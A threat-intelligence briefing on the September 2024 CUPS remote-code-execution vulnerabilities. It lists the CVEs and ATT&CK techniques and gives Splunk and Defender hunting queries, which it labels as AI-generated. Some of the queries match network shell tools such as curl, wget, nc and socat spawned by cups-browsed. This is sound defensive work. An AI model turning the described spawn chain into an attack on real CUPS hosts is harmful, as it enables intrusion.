# [HIGH] Zero-day RCE vulnerability found in CUPS - Common UNIX Printing System **Source:** Snyk **Published:** 2024-09-27 **Article:** https://snyk.io/blog/zero-day-rce-in-cups-vulnerability-sept-2024/ ## Threat Profile Snyk Blog In this article Written by Jim Armstrong September 27, 2024 0 mins read On September 27, 2024, evilsocket.net (Simone Margaritelli) published information about several vulnerabilities in CUPS (Common UNIX Printing System), which can allow for arbitrary remote code execution (RCE). There are currently 4 CVEs associated with these findings, with potentially more on the way. There is also some debate about the severity of these vulnerabilities, however, one of the CVEs was initially give… ## Indicators of Compromise (high-fidelity only) - **CVE:** `CVE-2024-47076` - **CVE:** `CVE-2024-47175` - **CVE:** `CVE-2024-47176` - **CVE:** `CVE-2024-47177` ## MITRE ATT&CK Techniques - **T1190** — Exploit Public-Facing Application - **T1203** — Exploitation for Client Execution - **T1059.004** — Command and Scripting Interpreter: Unix Shell - **T1546** — Event Triggered Execution - **T1027** — Obfuscated Files or Information ## Kill chain phases observed _(none detected from narrative keywords)_ ## Recommended hunts ### Inbound UDP/631 (CUPS IPP discovery) from external network `UC_1134_1` · phase: **delivery** · confidence: **Medium** · AI-generated for this article **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime values(All_Traffic.src) as src values(All_Traffic.bytes_in) as bytes_in from datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port=631 All_Traffic.transport=udp All_Traffic.src_category!=internal All_Traffic.action!=blocked by All_Traffic.dest All_Traffic.dest_port All_Traffic.transport | `drop_dm_object_name("All_Traffic")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` ``` **Defender KQL:** ```kql DeviceNetworkEvents | where Timestamp > ago(7d) | where LocalPort == 631 | where Protocol =~ "Udp" | where RemoteIPType == "Public" | where ActionType in ("InboundConnectionAccepted","ConnectionInbound","ConnectionSuccess") | project Timestamp, DeviceName, LocalIP, LocalPort, Protocol, RemoteIP, RemotePort, InitiatingProcessFileName, InitiatingProcessCommandLine | order by Timestamp desc ``` ### cups-browsed spawning foomatic-rip or shell child (CVE-2024-47177 RCE) `UC_1134_2` · phase: **exploit** · confidence: **High** · AI-generated for this article **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Processes.process) as process values(Processes.process_name) as process_name values(Processes.user) as user from datamodel=Endpoint.Processes where (Processes.parent_process_name IN ("cups-browsed","cupsd","foomatic-rip")) AND (Processes.process_name IN ("sh","bash","dash","foomatic-rip","curl","wget","python","python3","perl","nc","ncat")) by Processes.dest Processes.parent_process_name Processes.process_name Processes.process Processes.user | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` ``` **Defender KQL:** ```kql DeviceProcessEvents | where Timestamp > ago(7d) | where InitiatingProcessFileName in~ ("cups-browsed","cupsd","foomatic-rip") | where FileName in~ ("sh","bash","dash","foomatic-rip","curl","wget","python","python3","perl","nc","ncat","socat") or ProcessCommandLine has_any ("FoomaticRIPCommandLine","/tmp/","curl ","wget ","bash -c","sh -c") | project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, FolderPath, SHA256 | order by Timestamp desc ``` ### cups-browsed writing new PPD or config under /etc/cups or /var/cache/cups `UC_1134_3` · phase: **install** · confidence: **Medium** · AI-generated for this article **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.file_path) as file_path values(Filesystem.process_name) as process_name from datamodel=Endpoint.Filesystem where (Filesystem.file_path IN ("/etc/cups/ppd/*","/etc/cups/cups-browsed.conf*","/var/cache/cups/*","/etc/cups/printers.conf*")) AND Filesystem.process_name IN ("cups-browsed","cupsd") AND Filesystem.action=created by Filesystem.dest Filesystem.file_name Filesystem.process_name | `drop_dm_object_name("Filesystem")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` ``` **Defender KQL:** ```kql DeviceFileEvents | where Timestamp > ago(7d) | where ActionType in ("FileCreated","FileModified","FileRenamed") | where FolderPath startswith "/etc/cups/" or FolderPath startswith "/var/cache/cups/" | where InitiatingProcessFileName in~ ("cups-browsed","cupsd") | where FileName endswith ".ppd" or FileName has_any ("cups-browsed.conf","printers.conf") | project Timestamp, DeviceName, FolderPath, FileName, ActionType, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessAccountName, SHA256 | order by Timestamp desc ``` ### Linux assets with vulnerable CUPS packages and external exposure (CVE-2024-47175/76/77/076) `UC_1134_4` · phase: **recon** · confidence: **High** · AI-generated for this article **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count from datamodel=Vulnerabilities.Vulnerabilities where Vulnerabilities.cve IN ("CVE-2024-47175","CVE-2024-47176","CVE-2024-47177","CVE-2024-47076") by Vulnerabilities.dest Vulnerabilities.cve Vulnerabilities.signature Vulnerabilities.severity | `drop_dm_object_name("Vulnerabilities")` ``` **Defender KQL:** ```kql let CupsCVEs = dynamic(["CVE-2024-47175","CVE-2024-47176","CVE-2024-47177","CVE-2024-47076"]); DeviceTvmSoftwareVulnerabilities | where CveId in (CupsCVEs) | join kind=inner ( DeviceInfo | summarize arg_max(Timestamp, *) by DeviceId | where IsInternetFacing == true or OSPlatform startswith "Linux" ) on DeviceId | project DeviceId, DeviceName, OSPlatform, OSVersion, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel, RecommendedSecurityUpdate, IsInternetFacing | order by IsInternetFacing desc, CveId asc ``` ### IOC-driven hunts (use shared templates) These are standard IOC-substitution hunts — the canonical SPL and KQL live once in [`_TEMPLATES.md`](../_TEMPLATES.md), so we don't repeat the same boilerplate on every CVE / hash / network-IOC briefing. - **Asset exposure — vulnerability matches article CVE(s)** ([template](../_TEMPLATES.md#asset-exposure)) — phase: **recon**, confidence: **High** - CVE(s): `CVE-2024-47076`, `CVE-2024-47175`, `CVE-2024-47176`, `CVE-2024-47177` ## Why this matters Severity classified as **HIGH** based on: CVE present, 5 use case(s) fired, 5 technique(s) inferred. Read the full article for actor attribution, tooling details, and any defanged IOCs in the body that aren't visible in the RSS summary.